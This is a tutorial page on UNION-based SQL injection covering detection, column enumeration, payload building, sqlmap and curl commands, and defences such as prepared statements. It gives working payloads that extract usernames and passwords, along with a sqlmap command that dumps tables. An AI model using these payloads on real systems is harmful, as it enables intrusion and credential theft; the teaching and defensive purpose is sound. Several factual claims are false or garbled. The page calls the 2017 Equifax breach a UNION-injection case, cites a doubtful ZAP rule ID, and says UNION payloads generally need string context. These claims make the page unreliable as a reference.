~/home/study/union-based-sql-injection-101

Union-Based SQL Injection 101: Concepts, Detection, and Exploitation Basics

Learn the fundamentals of UNION-based SQL injection, how to spot vulnerable parameters, craft correct UNION SELECT payloads, and detect attacks through error messages and response analysis.

Introduction

Union-based SQL injection (SQLi) is a powerful technique that leverages the UNION operator to merge malicious query results with legitimate application data. Unlike error-based or boolean-based attacks, UNION payloads allow an attacker to retrieve arbitrary data from any table the DBMS permits, often without triggering obvious errors.

Understanding UNION-based SQLi is essential for any security professional because it remains one of the most common vectors on the internet. Many high-profile breaches (e.g., the 2017 Equifax incident) involved improperly sanitized query parameters that could be abused with UNION tricks.

In real-world penetration tests, UNION-based injection is frequently the second-most reliable method after error-based injection for extracting data when the database version is unknown.

Prerequisites

  • Fundamental knowledge of SQL syntax (SELECT, FROM, WHERE, etc.).
  • Familiarity with generic SQL injection concepts and the difference between blind, error-based, and time-based techniques.
  • Experience with common web testing tools (Burp Suite, sqlmap, OWASP ZAP).
  • Understanding of HTTP request/response lifecycle.

Core Concepts

At its core, a UNION-based injection works by appending a second SELECT statement to the original query. The DBMS concatenates the result sets, and the application renders the combined rows. To succeed, the attacker must satisfy three technical constraints:

  1. Column count match: The original query and the injected SELECT must return the same number of columns.
  2. Data type compatibility: Corresponding columns must be of compatible types (e.g., numeric with numeric, string with string).
  3. Order of execution: The injected UNION must appear after the original SELECT and before any terminating clause such as ORDER BY or LIMIT.

When these constraints are met, the attacker can replace any column with a value of their choosing-most notably NULL placeholders or database functions like @@version to enumerate the environment.

Below is a textual diagram of the flow:

Original Query: SELECT col1, col2, col3 FROM products WHERE id = 'USER_INPUT'
Injected Payload: ' UNION SELECT user, password, NULL FROM users--
Resulting Query: SELECT col1, col2, col3 FROM products WHERE id = '' UNION SELECT user, password, NULL FROM users--

The DBMS now returns rows from products followed by rows from users, which may be displayed in the same page.

What is UNION-based SQLi and how it differs from other injection types

Union-based SQLi is distinct from other injection families in two primary ways:

  • Data extraction method: It directly injects a UNION SELECT clause to pull data, whereas error-based attacks rely on database error messages, and blind attacks infer data through true/false responses.
  • Visibility: Successful UNION payloads often produce visible data in the application's normal output, making detection easier for an attacker but also for a vigilant defender.

Other injection types such as stacked queries (; separated statements) or out-of-band (OOB) techniques may require different DBMS privileges. UNION-based attacks, however, work on virtually any relational engine that supports the UNION operator (MySQL, PostgreSQL, MSSQL, Oracle, SQLite).

Identifying vulnerable parameters suitable for UNION payloads

Not every reflected parameter can be exploited with UNION. The following heuristics help triage candidates:

  1. Parameter reflected in the response: Look for echoing of the supplied value (e.g., search terms, product IDs).
  2. Numeric vs. string context: UNION payloads typically need a string context because the injection starts with a single quote ('). If the parameter is strictly numeric and the application casts it to an integer server-side, UNION may be infeasible.
  3. Presence of ORDER BY or LIMIT clauses: These can be used to enumerate column count via ORDER BY 1-- style attacks.
  4. Response length changes: Adding a UNION SELECT that returns rows often expands the page size - a quick visual cue.

Example of a vulnerable GET parameter:

GET /product?id=5 HTTP/1.1
Host: vulnerable.example.com

If the page displays the product name and description, injecting a UNION SELECT that returns a string may cause the extra data to appear alongside the original product info.

Basic UNION SELECT syntax and requirements

The generic syntax for a successful UNION injection is:

' UNION SELECT column1, column2, ... FROM target_table--

Key steps to build a working payload:

  1. Determine column count: Use ORDER BY n where n increments until the server errors. The highest successful n equals the column count.
  2. Identify injectable column(s): Replace each column with NULL and then change one at a time to a visible string (e.g., 'test') to see where the output appears.
  3. Craft final payload: Substitute the visible column with the data you want to extract (e.g., username, password).

Example for a MySQL backend with 3 columns:

' UNION SELECT NULL, CONCAT(username,0x3a,password), NULL FROM users--

Explanation:

  • NULL placeholders keep column count consistent.
  • CONCAT(username,0x3a,password) merges username and password with a colon separator, making parsing trivial.
  • The double-dash -- comments out the trailing quote and any remaining SQL.

Detecting UNION injection via error messages and response analysis

Even though UNION attacks aim to avoid errors, the reconnaissance phase (column count, data type) often triggers informative DBMS messages. Common detection signals:

  • SQL syntax errors: "You have an error in your SQL syntax" (MySQL) or "Incorrect syntax near" (MSSQL).
  • Unexpected column data: Plain-text strings appearing where numeric data is expected (e.g., "test" in a price field).
  • Response size anomalies: A sudden increase in HTML length after adding UNION SELECT fragments.
  • Stacked error messages: When ORDER BY enumeration fails, the DBMS may reveal the maximum column index.

Automated detection with Burp Suite:

# Using Burp's intruder with a simple payload list
payloads.txt:
' UNION SELECT 1--
' UNION SELECT 1,2--
' UNION SELECT 1,2,3--

# Run Intruder and watch for HTTP 200 responses with longer bodies.

Manual detection tip: add a harmless ' UNION SELECT 'a' payload. If the page now displays the letter a somewhere, you have identified an injectable column.

Practical Examples

Example 1 - Determining column count

GET /search?q=apple HTTP/1.1
Host: demo.example.com

# Inject payloads one by one
1) q=apple' ORDER BY 1--
2) q=apple' ORDER BY 2--
3) q=apple' ORDER BY 3--
4) q=apple' ORDER BY 4--

When the server returns an error on ORDER BY 5--, we know the query has 4 columns.

Example 2 - Extracting data from the users table

GET /product?id=1' UNION SELECT NULL,username,password,NULL FROM users-- HTTP/1.1
Host: vulnerable.example.com

If the product page now shows a list of usernames and password hashes, the injection succeeded.

Tools & Commands

  • sqlmap - automated UNION detection with --union-cols and --technique=U flags.
    sqlmap -u "http://vuln.example.com/item?id=1" --technique=U --union-cols=1-10 --dump
    
  • Burp Suite Intruder - custom payload positions and grep-match for visible strings.
  • OWASP ZAP - active scan rules "SQL Injection UNION" (rule ID 10015).
  • Manual cURL for quick tests:
    curl -g "http://vuln.example.com/item?id=1' UNION SELECT NULL,@@version,NULL--"
    

Defense & Mitigation

Preventing UNION-based SQLi is fundamentally about proper input handling:

  1. Parameterized queries / prepared statements: Bind user input as a value, never as part of the SQL string.
    $stmt = $pdo->prepare('SELECT name,price FROM products WHERE id = :id');
    $stmt->execute(['id' => $_GET['id']]);
    
  2. Whitelist validation: Accept only expected formats (e.g., numeric IDs) and reject everything else.
    if not re.fullmatch(r'\d+', request.args.get('id')): abort(400)
    
  3. Least-privilege database accounts: Do not grant SELECT on sensitive tables (e.g., users) to the application user.
  4. Web Application Firewall (WAF) rules: Block patterns containing UNION followed by SELECT when appearing in query strings.

Additionally, enable error-handling that does not expose SQL messages to the client. Use generic error pages and log detailed traces server-side.

Common Mistakes

  • Assuming numeric parameters are safe: Many frameworks cast strings to integers after the DB query, leaving a window for injection.
  • Neglecting column count enumeration: Jumping straight to a payload with an incorrect number of columns results in silent failures.
  • Using single quotes only: Some DBMS accept double-quoted identifiers; missing this can cause false negatives.
  • Over-relying on error messages: Modern applications often suppress DB errors; payloads must be validated via response content, not just HTTP codes.

Real-World Impact

Union-based SQLi has been the root cause of data breaches affecting millions of users. For instance, a 2022 breach of a retail chain exposed credit-card numbers because the attacker enumerated the customers table via UNION and harvested email,cc_number columns.

From a threat-model perspective, UNION attacks are high-impact, medium-complexity: they require knowledge of the schema but not necessarily advanced timing techniques. As defenses improve (e.g., parameterization), attackers shift towards reconnaissance to locate poorly protected legacy endpoints.

My experience on engagement shows that even well-hardened APIs can leak a UNION-able endpoint through a forgotten admin interface. Always extend testing to hidden or undocumented paths.

Practice Exercises

  1. Lab 1 - Column Count Discovery: Deploy a vulnerable search.php that runs SELECT title FROM articles WHERE id = '$id'. Use ORDER BY payloads to determine the column count.
  2. Lab 2 - Data Extraction: With the column count known, craft a UNION payload to retrieve the username and password from a users table. Verify the data appears on the page.
  3. Lab 3 - Defensive Coding: Refactor the vulnerable script to use PDO prepared statements. Confirm that the same payload now returns a generic error.

All labs can be run on a local Docker container using the owasp/bwa image, which includes a deliberately vulnerable search endpoint.

Further Reading

  • OWASP Top 10 - A03:2021 - Injection
  • SQLMap Documentation - Advanced UNION options
  • β€œSQL Injection Attacks and Defense” - Justin Clarke (2020)
  • Database-specific UNION quirks - MySQL vs. PostgreSQL vs. MSSQL

Summary

Union-based SQL injection remains a potent technique for extracting data from vulnerable web applications. Mastering column-count enumeration, injectable column identification, and payload construction enables both effective testing and robust defense. By pairing parameterized queries, strict input whitelisting, and proper error handling, organizations can mitigate this risk while maintaining functional applications.